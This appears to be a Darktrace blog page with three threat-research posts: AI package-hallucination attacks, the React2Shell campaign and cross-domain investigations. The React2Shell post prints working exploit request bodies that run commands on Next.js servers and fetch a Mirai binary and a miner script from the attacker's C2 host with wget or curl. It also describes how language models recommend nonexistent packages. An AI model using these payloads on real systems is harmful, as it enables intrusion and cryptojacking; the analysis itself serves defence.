October 30, 2023

Exploring AI Threats: Package Hallucination Attacks

Learn how malicious actors exploit errors in generative AI tools to launch package attacks. Read how Darktrace products detect and prevent these threats!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst

AI tools open doors for threat actors

On November 30, 2022, the free conversational language generation model ChatGPT was launched by OpenAI, an artificial intelligence (AI) research and development company. The launch of ChatGPT was the culmination of development ongoing since 2018; it represented the latest innovation in the generative AI boom and made generative AI tools accessible to the general population for the first time.

ChatGPT is estimated to currently have at least 100 million users, and in August 2023 the site reached 1.43 billion visits [1]. Darktrace data indicated that, as of March 2023, 74% of active customer environments have employees using generative AI tools in the workplace [2].

However, with new tools come new opportunities for threat actors to exploit and use them maliciously, expanding their arsenal.

Much consideration has been given to mitigating the impacts of the increased linguistic complexity in social engineering and phishing attacks resulting from generative AI tool use, with Darktrace observing a 135% increase in ‘novel social engineering attacks’ across thousands of active Darktrace/Email™ customers from January to February 2023, corresponding with the widespread adoption of ChatGPT and its peers [3].

Less overall consideration, however, has been given to impacts stemming from errors intrinsic to generative AI tools. One of these errors is AI hallucinations.

What is an AI hallucination?

AI “hallucination” is a term used when the predictive elements of generative AI and large language models (LLMs) cause a model to give an unexpected or factually incorrect response that does not align with its machine learning training data [4]. This differs from the regular and intended behavior of an AI model, which should provide a response based on the data it was trained upon.

Why are AI hallucinations a problem?

Despite the term indicating it might be a rare phenomenon, hallucinations are far more likely than accurate or factual results as the AI models used in LLMs are merely predictive and focus on the most probable text or outcome, rather than factual accuracy.

Given the widespread use of generative AI tools in the workplace, employees are becoming significantly more likely to encounter an AI hallucination. Furthermore, if these fabricated hallucination responses are taken at face value, they could cause significant issues for an organization.

Use of generative AI in software development

Software developers may use generative AI for recommendations on how to optimize their scripts or code, or to find packages to import into their code for various uses. They may ask LLMs for recommendations on specific pieces of code or how to solve a specific problem, which will often lead to a recommendation of a third-party package. It is possible that packages recommended by generative AI tools represent AI hallucinations: the packages may never have been published, or, more accurately, may not have been published prior to the cut-off date of the model’s training data. If the model commonly suggests the same non-existent package and developers copy the code snippet wholesale, this may leave their codebases vulnerable to attack.
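As a simple safeguard, developers can confirm that an LLM-suggested package name actually exists in the relevant registry before installing anything. The snippet below is a minimal sketch for Python packages, using PyPI’s public JSON endpoint (which returns a 404 for names that have never been published); note that existence alone is no guarantee of safety, since an attacker may already have registered a hallucinated name.

```python
import sys
import urllib.error
import urllib.request


def package_exists_on_pypi(name: str) -> bool:
    """Return True if `name` is a published PyPI project.

    PyPI's JSON endpoint returns HTTP 404 for names that have never been
    published, which is exactly where a hallucinated package would fall
    (until an attacker registers it).
    """
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with urllib.request.urlopen(url, timeout=10):
            return True
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise  # other errors (rate limiting, outages) need human review


if __name__ == "__main__":
    # Usage: python check_packages.py <package> [<package> ...]
    for pkg in sys.argv[1:]:
        verdict = "exists on PyPI" if package_exists_on_pypi(pkg) else "NOT published on PyPI"
        print(f"{pkg}: {verdict}")
```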

Research conducted by Vulcan revealed the prevalence of AI hallucinations when ChatGPT is asked questions related to coding. After sourcing a sample of commonly asked coding questions from Stack Overflow, a question-and-answer website for programmers, researchers queried ChatGPT (in the context of Node.js and Python) and reviewed its responses. At least one unpublished package was included in 20% of the Node.js responses, while the figure was around 35% for Python [4].

Hallucinations can be unpredictable, but would-be attackers are able to find packages to create by asking generative AI tools generic questions and checking whether the suggested packages exist already. As such, attacks using this vector are unlikely to target specific organizations, instead posing more of a widespread threat to users of generative AI tools.

Malicious packages as attack vectors

Although AI hallucinations can be unpredictable, and responses given by generative AI tools may not always be consistent, malicious actors are able to discover AI hallucinations by adopting the approach used by Vulcan. This allows hallucinated packages to be used as attack vectors. Once a malicious actor has discovered a hallucination of an un-published package, they are able to create a package with the same name and include a malicious payload, before publishing it. This is known as a malicious package.

Malicious packages could also be recommended by generative AI tools in the form of pre-existing packages. A user may be recommended a package that had previously been confirmed to contain malicious content, or a package that is no longer maintained and, therefore, is more vulnerable to hijack by malicious actors.

In such scenarios it is not necessary to manipulate the training data (data poisoning) to achieve the desired outcome for the malicious actor, thus a complex and time-consuming attack phase can easily be bypassed.

An unsuspecting software developer may incorporate a malicious package into their code, rendering it harmful. Deployment of this code could then result in compromise and escalation into a full-blown cyber-attack.

Figure 1: Flow diagram depicting the initial stages of an AI Package Hallucination Attack.

For providers of Software-as-a-Service (SaaS) products, this attack vector may represent an even greater risk. Such organizations may have a higher proportion of employed software developers than other organizations of comparable size. A threat actor, therefore, could utilize this attack vector as part of a supply chain attack, whereby a malicious payload becomes incorporated into trusted software and is then distributed to multiple customers. This type of attack could have severe consequences including data loss, the downtime of critical systems, and reputational damage.

How could Darktrace detect an AI Package Hallucination Attack?

In June 2023, Darktrace introduced a range of DETECT™ and RESPOND™ models designed to identify the use of generative AI tools within customer environments, and to autonomously perform inhibitive actions in response to such detections. These models trigger on connections to endpoints associated with generative AI tools; as such, Darktrace’s detection of an AI Package Hallucination Attack would likely begin with a breach of one of the following DETECT models:

  • Compliance / Anomalous Upload to Generative AI
  • Compliance / Beaconing to Rare Generative AI and Generative AI
  • Compliance / Generative AI

Should generative AI tool use not be permitted by an organization, the Darktrace RESPOND model ‘Antigena / Network / Compliance / Antigena Generative AI Block’ can be activated to autonomously block connections to endpoints associated with generative AI, thus preventing an AI Package Hallucination attack before it can take hold.
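The underlying idea in both cases is visibility and policy enforcement on egress: connections to endpoints associated with generative AI tools are identified and, where policy requires, blocked. The sketch below illustrates the concept only; the domain list and log format are illustrative assumptions, not Darktrace’s actual model logic.

```python
from typing import Dict, Iterable, Iterator, Tuple

# Illustrative list only; a real deployment would maintain a far broader,
# curated set of generative AI endpoints.
GENERATIVE_AI_DOMAINS = {
    "chat.openai.com",
    "api.openai.com",
    "bard.google.com",
    "claude.ai",
}


def flag_generative_ai_lookups(dns_log: Iterable[Dict[str, str]]) -> Iterator[Tuple[str, str]]:
    """Yield (device, domain) pairs for DNS lookups of generative AI services.

    `dns_log` is assumed to be an iterable of records with 'device' and
    'query' keys (a hypothetical log shape, not a Darktrace format).
    """
    for record in dns_log:
        query = record["query"].lower().rstrip(".")
        if any(query == d or query.endswith("." + d) for d in GENERATIVE_AI_DOMAINS):
            yield record["device"], query


if __name__ == "__main__":
    sample_log = [
        {"device": "laptop-042", "query": "chat.openai.com"},
        {"device": "laptop-007", "query": "intranet.example.com"},
    ]
    for device, domain in flag_generative_ai_lookups(sample_log):
        print(f"{device} contacted generative AI endpoint {domain}")
```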

Once a malicious package has been recommended, it may be downloaded from GitHub, a platform and cloud-based service used to store and manage code. Darktrace DETECT is able to identify when a device has performed a download from an open-source repository such as GitHub using the following models:

  • Device / Anomalous GitHub Download
  • Device / Anomalous Script Download Followed By Additional Packages

The goal the malicious package was designed to fulfil will determine the next stages of the attack. Due to their highly flexible nature, AI package hallucinations could be used as an attack vector to deliver a wide variety of malware types.

As GitHub is a service commonly used by software developers and IT professionals alike, traditional security tools may not alert customer security teams to such GitHub downloads, meaning malicious downloads may go undetected. Darktrace’s anomaly-based approach to threat detection, however, enables it to recognize subtle deviations in a device’s pre-established pattern of life which may be indicative of an emerging attack.
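To illustrate the idea (and only the idea; this is not how Darktrace’s models are implemented), a ‘pattern of life’ baseline can be reduced to a toy example: remember which external hosts each device normally contacts, then flag downloads from hosts that are new for that device and rare across the rest of the estate.

```python
from collections import defaultdict


class PatternOfLife:
    """Toy 'pattern of life' baseline: remembers which external hosts each
    device normally contacts and how widely each host is used in the estate."""

    def __init__(self) -> None:
        self.device_hosts = defaultdict(set)       # device -> hosts seen during baselining
        self.host_device_count = defaultdict(int)  # host -> number of devices using it

    def learn(self, device: str, host: str) -> None:
        """Record an observation from the baselining period."""
        if host not in self.device_hosts[device]:
            self.device_hosts[device].add(host)
            self.host_device_count[host] += 1

    def is_anomalous(self, device: str, host: str, rare_threshold: int = 3) -> bool:
        """Flag a host this device has never contacted before and that few
        other devices in the estate use either."""
        new_for_device = host not in self.device_hosts[device]
        rare_in_estate = self.host_device_count[host] < rare_threshold
        return new_for_device and rare_in_estate


if __name__ == "__main__":
    baseline = PatternOfLife()
    baseline.learn("dev-workstation-01", "github.com")
    baseline.learn("dev-workstation-02", "github.com")
    # A server suddenly pulling code from a host it has never used stands out,
    # even though downloads from code repositories are normal elsewhere.
    print(baseline.is_anomalous("build-server-01", "raw.examplecdn.net"))  # True
    print(baseline.is_anomalous("dev-workstation-01", "github.com"))       # False
```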

Subsequent anomalous activity representing the possible progression of the kill chain as part of an AI Package Hallucination Attack could then trigger an Enhanced Monitoring model. Enhanced Monitoring models are high-fidelity indicators of potential malicious activity that are investigated by the Darktrace analyst team as part of the Proactive Threat Notification (PTN) service offered by the Darktrace Security Operation Center (SOC).

Conclusion

Employees are often considered the first line of defense in cyber security; this is particularly true in the face of an AI Package Hallucination Attack.

As the use of generative AI becomes more accessible and an increasingly prevalent tool in an attacker’s toolbox, organizations will benefit from implementing company-wide policies to define expectations surrounding the use of such tools. It is simple, yet critical, for example, for employees to fact-check responses provided to them by generative AI tools. All packages recommended by generative AI should also be checked against non-generated data from external third-party or internal sources. It is also good practice to exercise caution when downloading packages with very few downloads, as this could indicate that the package is untrustworthy or malicious.
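As a concrete example of the latter, a hypothetical pre-install check could look up recent download counts before a package is adopted. The sketch below assumes the public pypistats.org API and its current response shape, and uses an arbitrary threshold; treat it as a starting point rather than a definitive vetting step.

```python
import json
import sys
import urllib.request

DOWNLOAD_THRESHOLD = 1000  # arbitrary example cut-off; tune to your risk appetite


def recent_downloads(package: str) -> int:
    """Return the package's download count for the last month.

    Assumes the public pypistats.org API and its response shape; verify
    both before relying on this check in practice.
    """
    url = f"https://pypistats.org/api/packages/{package.lower()}/recent"
    with urllib.request.urlopen(url, timeout=10) as resp:
        payload = json.load(resp)
    return payload["data"]["last_month"]


if __name__ == "__main__":
    for pkg in sys.argv[1:]:
        count = recent_downloads(pkg)
        note = "" if count >= DOWNLOAD_THRESHOLD else "  <- very few downloads, review before installing"
        print(f"{pkg}: ~{count} downloads in the last month{note}")
```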

As of September 2023, ChatGPT Plus and Enterprise users were able to use the tool to browse the internet, expanding the data ChatGPT can access beyond the previous training data cut-off of September 2021 [5]. This feature will be expanded to all users soon [6]. ChatGPT providing up-to-date responses could prompt the evolution of this attack vector, allowing attackers to publish malicious packages which could subsequently be recommended by ChatGPT.

It is inevitable that a greater embrace of AI tools in the workplace will be seen in the coming years as the AI technology advances and existing tools become less novel and more familiar. By fighting fire with fire, using AI technology to identify AI usage, Darktrace is uniquely placed to detect and take preventative action against malicious actors capitalizing on the AI boom.

Credit to Charlotte Thompson (Cyber Analyst) and Tiana Kelly (Deputy Team Lead, London & Cyber Analyst)

References

[1] https://seo.ai/blog/chatgpt-user-statistics-facts

[2] https://darktrace.com/news/darktrace-addresses-generative-ai-concerns

[3] https://darktrace.com/news/darktrace-email-defends-organizations-against-evolving-cyber-threat-landscape

[4] https://vulcan.io/blog/ai-hallucinations-package-risk?nab=1&utm_referrer=https%3A%2F%2Fwww.google.com%2F

[5] https://twitter.com/OpenAI/status/1707077710047216095

[6] https://www.reuters.com/technology/openai-says-chatgpt-can-now-browse-internet-2023-09-27/



December 11, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours


What is React2Shell?

CVE-2025-55182, also known as React2Shell, is a vulnerability in React Server Components that allows an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and its ease of exploitation led threat actors to opportunistically exploit it within days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing exploitation of the vulnerability to be monitored in the wild.

Cloudypots is a system that enables virtual instances of vulnerable applications to be deployed in the cloud and monitored for attack. This approach allows Darktrace to deploy high-interaction, realistic honeypots that appear to attackers as genuine deployments of vulnerable software.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers remaining unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server with IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provider known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts roughly every hour.

When scanning, the spreader primarily targets port 3000, the default port for a Next.js server in a default or development configuration. It is possible the attacker is avoiding ports 80 and 443, as these are more likely to have reverse proxies or WAFs in front of the server, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. It allows the attacker to confirm that the server is vulnerable and to fetch the user account under which the Next.js process is running, which is useful for determining whether a target is worth attacking.

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to download several payloads into the /dev directory using wget (or curl if wget fails) and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations from regular Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Figure 1: Logs observed in the Next.js console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes using ‘pkill’, matching on specific names. It will check for and terminate:

  • xmrig
  • softirq (this also matches a system process, which it will fail to kill each invocation)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script checks for a process named “fghgf”. If it is not running, it retrieves hxxp://89[.]144.31.18/nuts/lc and writes it to /dev/ijnegrrinje.json, and retrieves hxxp://89[.]144.31.18/nuts/x, writing it to /dev/fghgf. The script then executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background; /dev/fghgf is an XMRig miner.

Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads each one’s /proc/<pid>/exe path, which points to the original executable that was run. The ‘strings’ utility is run to output all printable ASCII strings found within that binary, and the script checks whether the output contains “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to terminate the process.

Additionally, it will run ‘ls -l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program (a simplified, read-only rendering of this logic is sketched after Figure 3):

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
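For clarity, the behaviour described above can be rendered as a simplified, read-only Python sketch. This is an approximation for illustration only, not the attacker’s actual script: it reports matching processes rather than killing them, and defenders could reuse the same logic to hunt for the miner and its companions.

```python
import os
import re

MARKERS_IN_BINARY = (b"xmrig", b"rondo", b"UPX 5")
MARKERS_IN_PATH = ("(deleted)", "xmrig", "hash", "watcher",
                   "/dev/a", "softirq", "rondo", "UPX 5.02")


def ascii_strings(data: bytes, min_len: int = 4):
    """Rough equivalent of the 'strings' utility: runs of printable ASCII."""
    return re.findall(rb"[ -~]{%d,}" % min_len, data)


def scan_processes() -> None:
    """Report (but do not kill) processes matching the markers described above."""
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        exe_link = f"/proc/{entry}/exe"
        try:
            # readlink() appends ' (deleted)' when the backing file has been
            # removed from disk, the evasion trick the script also checks for.
            target = os.readlink(exe_link)
            with open(exe_link, "rb") as fh:
                data = fh.read()
        except OSError:
            continue  # kernel threads, exited processes, insufficient privileges

        strings_hit = any(m in s for s in ascii_strings(data) for m in MARKERS_IN_BINARY)
        path_hit = any(m in target for m in MARKERS_IN_PATH)
        if strings_hit or path_hit:
            # stink.sh sends SIGKILL at this point; this sketch only reports.
            print(f"match: pid={entry} exe={target}")


if __name__ == "__main__":
    scan_processes()
```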

Darktrace observations in customer environments  

Following the public disclosure of CVE-2025-55182 in early December, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeated infrastructure clusters, Darktrace identified a consistent kill chain involving shell-script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoints. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement activity, attempting SMB and RDP sessions with other internal devices on the network. This chain of events suggests the activity was related to the campaign exploiting the React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  
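These observations translate naturally into simple log-matching logic. The sketch below is a hypothetical triage helper built only from the indicators listed above (the port range, URIs, user agents, and loader query parameters); the field names are assumptions about the log schema rather than a Darktrace format.

```python
from typing import Dict
from urllib.parse import parse_qs, urlparse

SUSPECT_PORTS = set(range(3000, 3012))         # 3000-3011 inclusive
SUSPECT_URIS = ("/nuts/x86", "/n2/x86")
SUSPECT_AGENT_PREFIXES = ("curl/", "Wget/")
LOADER_PARAMS = {"h", "p", "t", "a", "stage"}  # /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true


def looks_like_react2shell_activity(record: Dict[str, object]) -> bool:
    """Return True if an outbound HTTP record matches the indicators above.

    `record` is assumed to contain 'dest_port', 'uri' and 'user_agent' fields;
    adapt the keys to your own log schema.
    """
    port_hit = record["dest_port"] in SUSPECT_PORTS
    parsed = urlparse(str(record["uri"]))
    uri_hit = parsed.path in SUSPECT_URIS or parsed.path.endswith(".sh")
    loader_hit = LOADER_PARAMS.issubset(parse_qs(parsed.query).keys())
    agent_hit = str(record["user_agent"]).startswith(SUSPECT_AGENT_PREFIXES)
    # Require the unusual port plus at least one content-based indicator to keep
    # false positives from ordinary curl/wget usage manageable.
    return port_hit and (uri_hit or loader_hit or agent_hit)


if __name__ == "__main__":
    sample = {"dest_port": 3001, "uri": "/nuts/x86", "user_agent": "curl/8.5.0"}
    print(looks_like_react2shell_activity(sample))  # True
```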

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign exploiting React2Shell is not particularly sophisticated, it demonstrates that attackers can rapidly prototype new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, it serves as a clear reminder that patching vulnerabilities as soon as fixes are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead), and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

About the author
Nathaniel Bill
Malware Research Engineer

December 8, 2025

Simplifying Cross Domain Investigations


Cross-domain gaps mean cross-domain attacks  

Organizations are built on increasingly complex digital estates. Nowadays, the average IT ecosystem spans a large web of interconnected domains like identity, network, cloud, and email.

While these domain-specific technologies may boost business efficiency and scalability, they also provide blind spots where attackers can shelter undetected. Threat actors can slip past defenses because security teams often use different detection tools in each realm of their digital infrastructure. Adversaries will purposefully execute different stages of an attack across different domains, ensuring no single tool picks up too many traces of their malicious activity. Identifying and investigating this type of threat, known as a cross-domain attack, requires mastery in event correlation.  

For example, one isolated network scan detected on your network may seem harmless at first glance. Only when it is stitched together with a rare O365 login, a new email rule and anomalous remote connections to an S3 bucket in AWS does it begin to manifest as an actual intrusion.  

However, there are a whole host of other challenges that arise with detecting this type of attack. Accessing those alerts in the respective on-premise network, SaaS and IaaS environments, understanding them and identifying which ones are related to each other takes significant experience, skill and time. And time favours no one but the threat actor.  

Figure 1: Anatomy of a cross domain attack

Diverse domains and empty grocery shelves

In April 2025, the UK faced a throwback to pandemic-era shortages when the supermarket giant Marks & Spencer (M&S) was crippled by a cyberattack, leaving empty shelves across its stores and massive disruptions to its online service.  

The threat actors, a group called Scattered Spider, exploited multiple layers of the organization’s digital infrastructure. Notably, the group were able to bypass the perimeter not by exploiting a technical vulnerability, but by exploiting an identity. They used social engineering tactics to impersonate an M&S employee and successfully request a password reset.

Once authenticated on the network, they accessed the Windows domain controller and exfiltrated the NTDS.dit file – a critical file containing hashed passwords for all users in the domain. After cracking those hashes offline, they returned to the network with escalated privileges and set their sights on the M&S cloud infrastructure. They then launched the encryption payload on the company’s ESXi virtual machines.

To wrap up, the threat actors used a compromised employee’s email account to send an “abuse-filled” email to the M&S CEO, bragging about the hack and demanding payment. This was possibly more of a psychological attack on the CEO than a technically integral part of the cyber kill chain. However, it revealed yet another one of M&S’s domains had been compromised.  

In summary, the group’s attack spanned four different domains:

  • Identity: Social engineering user impersonation
  • Network: Exfiltration of the NTDS.dit file
  • Cloud: Ransomware deployed on ESXi VMs
  • Email: Compromise of a user account to contact the CEO

Adept at exploiting nuance

This year alone, several high-profile cyber-attacks have been attributed to the same group, Scattered Spider, including the hacks on Victoria’s Secret, Adidas, Hawaiian Airlines, WestJet, the Co-op and Harrods. It begs the question, what has made this group so successful?

In the M&S attack, they showcased their advanced proficiency in social engineering, which they use to bypass identity controls and gain initial access. They demonstrated deep knowledge of cloud environments by deploying ransomware onto virtualised infrastructure. However, this does not exemplify a cookie-cutter template of attack methods that brings them success every time.

According to CISA, Scattered Spider typically use a remarkable variety of TTPs (tactics, techniques and procedures) across multiple domains to carry out their campaigns. From leveraging legitimate remote access tools in the network, to manipulating AWS EC2 cloud instances or spoofing email domains, the list of TTPs used by the group is eye-wateringly long. Additionally, the group reportedly evades detection by “frequently modifying their TTPs”.  

If only they had better intentions. Any security director would be proud of a red team who not only has this depth and breadth of domain-centric knowledge but is also consistently upskilling.  

Yet, staying ahead of adversaries who seamlessly move across domains and fluently exploit every system they encounter is just one of many hurdles security teams face when investigating cross-domain attacks.  

Resource-heavy investigations

There was a significant delay in time to detection of the M&S intrusion. News outlet BleepingComputer reported that attackers infiltrated the M&S network as early as February 2025. They maintained persistence for weeks before launching the attack in late April 2025, indicating that early signs of compromise were missed or not correlated across domains.

While it’s unclear exactly why M&S missed the initial intrusion, one can speculate about the unique challenges investigating cross-domain attacks present.  

Challenges of cross-domain investigation

First and foremost, correlation work is arduous because the string of malicious behaviour doesn’t always stem from the same device.  

A hypothetical attack could begin with an O365 credential creating a new email rule. Weeks later, that same credential authenticates anomalously on two different devices. One device downloads an .exe file from a strange website, while the other starts beaconing every minute to a rare external IP address that no one else in the organisation has ever connected to. A month later, a third device downloads 1.3 GiB of data from a recently spun up S3 bucket and gradually transfers a similar amount of data to that same rare IP.

Amid a sea of alerts and false positives, connecting the dots of a malicious attack like this takes time and meticulous correlation. Factor in the nuanced telemetry data related to each domain and things get even more complex.  
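To make the correlation problem concrete, the toy sketch below groups events into incidents whenever they share an entity (a credential, device, bucket or IP address), then orders each incident by time. It is only an illustration of the basic idea; real cross-domain correlation, of the kind discussed later in this post, has to cope with noisy telemetry, ambiguous identities and far larger volumes.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List


@dataclass
class Event:
    time: datetime
    domain: str          # e.g. "identity", "email", "network", "cloud"
    entities: List[str]  # credentials, devices, buckets, IPs tied to the event
    summary: str


def correlate(events: List[Event]) -> List[List[Event]]:
    """Group events into incidents whenever they share an entity (union-find),
    then return each incident as a time-ordered list of events."""
    parent: Dict[str, str] = {}

    def find(x: str) -> str:
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a: str, b: str) -> None:
        parent[find(a)] = find(b)

    for ev in events:
        for other in ev.entities[1:]:
            union(ev.entities[0], other)

    groups = defaultdict(list)
    for ev in events:
        groups[find(ev.entities[0])].append(ev)
    return [sorted(group, key=lambda e: e.time) for group in groups.values()]


if __name__ == "__main__":
    events = [
        Event(datetime(2025, 1, 1), "email", ["cred:alice"], "new inbox rule created"),
        Event(datetime(2025, 1, 20), "identity", ["cred:alice", "device:host-a"], "anomalous authentication"),
        Event(datetime(2025, 1, 21), "network", ["device:host-a", "ip:198.51.100.7"], "beaconing to rare IP"),
        Event(datetime(2025, 2, 20), "cloud", ["device:host-b", "ip:198.51.100.7"], "S3 download, slow upload to same rare IP"),
    ]
    for incident in correlate(events):
        print(" -> ".join(e.summary for e in incident))
```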

An analyst who specialises in network security may not understand the unique logging formats or API calls in the cloud environment. Perhaps they are proficient in protecting the Windows Active Directory but are unfamiliar with cloud IAM.  

Cloud is also an inherently more difficult domain to investigate. With 89% of organizations now operating in multi-cloud environments, time must be spent collecting logs, snapshots and access records. Coupled with the threat of an ephemeral asset disappearing, the risk of missing a threat is high. These are some of the reasons why research shows that 65% of organisations spend 3-5 extra days investigating cloud incidents.

